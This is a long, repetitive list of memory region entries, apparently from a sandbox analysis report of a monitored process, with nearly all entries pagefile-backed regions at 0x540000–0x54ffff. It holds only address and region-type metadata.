Region: id = 4243 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4244 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4245 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4246 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4247 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4248 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4249 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4250 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4251 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4252 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4253 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4254 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4255 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4256 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4257 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4258 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4259 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4260 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4261 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4262 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4263 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4264 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4265 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4266 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4267 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4268 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4269 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4270 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4271 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4272 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4273 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4274 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4275 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4276 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4277 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4278 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4279 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4280 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4281 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4282 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4283 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4284 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4285 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4286 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4287 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 4288 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 4289 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4290 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4291 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4292 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4293 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4294 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4295 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4296 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4297 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4298 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4299 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4300 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4301 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4302 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4303 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4304 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4305 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4306 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4307 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4308 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4309 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4315 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4316 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4317 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4318 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4319 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4320 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4321 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4322 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4323 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4324 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4325 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4326 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4327 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4328 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4329 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4330 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4331 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4332 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4333 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4334 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4335 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4342 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4343 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4344 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4345 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4346 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4347 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4348 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4349 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4350 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4351 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4352 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4353 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4354 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4355 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4356 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4357 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4358 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4359 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4360 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4361 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4362 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4363 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4365 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4366 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4367 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4368 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4369 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4370 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4371 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4372 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4373 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4374 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4375 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4376 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4377 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4378 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4379 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4381 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4382 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4383 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4384 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4385 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4386 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4387 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4388 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4389 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4390 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4391 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4392 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4393 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4394 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4395 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4396 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4397 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4398 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4402 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4403 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4404 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4405 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4406 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4407 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4408 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4409 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4410 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4411 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4412 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4413 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4414 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4415 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4416 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4417 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4418 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4419 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4420 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 4424 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 4425 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4426 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4427 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4428 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4429 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4430 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4431 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4432 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4433 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4434 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4435 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4436 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4437 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4438 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4439 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4440 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4441 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4442 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4443 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4444 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4445 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4446 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4447 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4448 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4449 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" 